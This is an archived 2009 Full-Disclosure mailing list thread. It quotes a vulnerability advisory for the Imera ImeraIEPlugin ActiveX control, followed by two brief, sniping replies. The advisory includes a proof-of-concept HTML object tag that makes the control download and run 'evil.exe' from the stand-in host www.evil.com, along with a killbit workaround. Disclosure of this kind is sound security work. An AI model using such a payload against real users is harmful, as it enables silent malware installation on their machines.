[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Imera ImeraIEPlugin ActiveX Control Remote Code Execution

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: Re: [Full-disclosure] Imera ImeraIEPlugin ActiveX Control Remote Code Execution
From: Jason Starks <jstarks440@xxxxxxxxx>
Date: Wed, 4 Mar 2009 13:59:45 -0500

That is why most of them are submitted to bugtraq (ew), and not FD, where
they are often discredited in various ways. You see, bugtraq will reject 4
out of 7 postings if your not a subscriber to their super fun security
package, which offers lots of enjoyment of white hat and hacking zone-h
labs. On this ridiculus list, its hard not to get your post through! Kazaa!

On Wed, Mar 4, 2009 at 3:51 AM, bob jones <bholdaaa@xxxxxxxxx> wrote:

> doesn't submitting lame bugs in useless apps ever get old?
>
> On Tue, Mar 3, 2009 at 9:12 AM, Elazar Broad <elazar@xxxxxxxxxxxx> wrote:
>
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> Who:
>>  Imera(http://www.imera.com)
>>  Imera TeamLinks Client(http://teamlinks.imera.com/install.html)
>>
>> What:
>>  ImeraIEPlugin.dll
>>  Version 1.0.2.54
>>  Dated 12/02/2008
>>  {75CC8584-86D4-4A50-B976-AA72618322C6}
>>  http://teamlinks.imera.com/ImeraIEPlugin.cab
>>
>> How:
>>  This control is used to install the Imera TeamLinks Client
>> package. The control fails to validate the content that it is to
>> download and install is indeed the Imera TeamLinks Client software.
>>
>> Exploiting this issue is quite simple, like so:
>>
>> <object classid="clsid:75CC8584-86D4-4A50-B976-AA72618322C6"
>> id="obj">
>>        <param name="DownloadProtocol" value="http" />
>>        <param name="DownloadHost" value="www.evil.com" />
>>        <param name="DownloadPort" value="80" />
>>        <param name="DownloadURI" value="evil.exe" />
>> </object>
>>
>> Fix:
>>  The vendor has been notified.
>>
>> Workaround:
>>  Set the killbit for the affected control, see
>> http://support.microsoft.com/kb/240797.
>> Use the Java installer for TeamLinks Client or install the software
>> manually from: http://teamlinks.imera.com/download.html
>>
>> Elazar
>> -----BEGIN PGP SIGNATURE-----
>> Charset: UTF8
>> Note: This signature can be verified at https://www.hushtools.com/verify
>> Version: Hush 3.0
>>
>> wpwEAQECAAYFAkmtR6YACgkQi04xwClgpZgbTgP/T3l+Gj+pIt19H80tiHrlbpbB7+qh
>> /03/vQYTEL75n0XCmfGjbcurLhWlo+m90eDQwlgigq3CoQyqleKNI8kSDYjr2pw289Pm
>> qC21ASe/P3zIM+gt81+iqDtKMA/MGvOE20nrHVEWlatAlCgmSjt3MJhqEJ/GdzUiR22s
>> BDrpVM8=
>> =R0h3
>> -----END PGP SIGNATURE-----
>>
>> --
>> Thinking of a life with religion?  Click here to find a religious school
>> near you.
>>
>> http://tagline.hushmail.com/fc/BLSrjkqkOt2ULsSphoguIMPooi9T2eJVBhBNEJeyTxDH8nsQ8r6djRRztwU/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] Imera ImeraIEPlugin ActiveX Control Remote Code Execution
  - From: Elazar Broad
- Re: [Full-disclosure] Imera ImeraIEPlugin ActiveX Control Remote Code Execution
  - From: bob jones

Prev by Date: Re: [Full-disclosure] Cisco Security Advisory: Cisco 7600 Series Router Session Border Controller Denial of Service Vulnerability
Next by Date: Re: [Full-disclosure] Zabbix 1.6.2 Frontend Multiple Vulnerabilities
Previous by thread: Re: [Full-disclosure] Imera ImeraIEPlugin ActiveX Control Remote Code Execution
Next by thread: [Full-disclosure] [ MDVSA-2009:064 ] imap
Index(es):
- Date
- Thread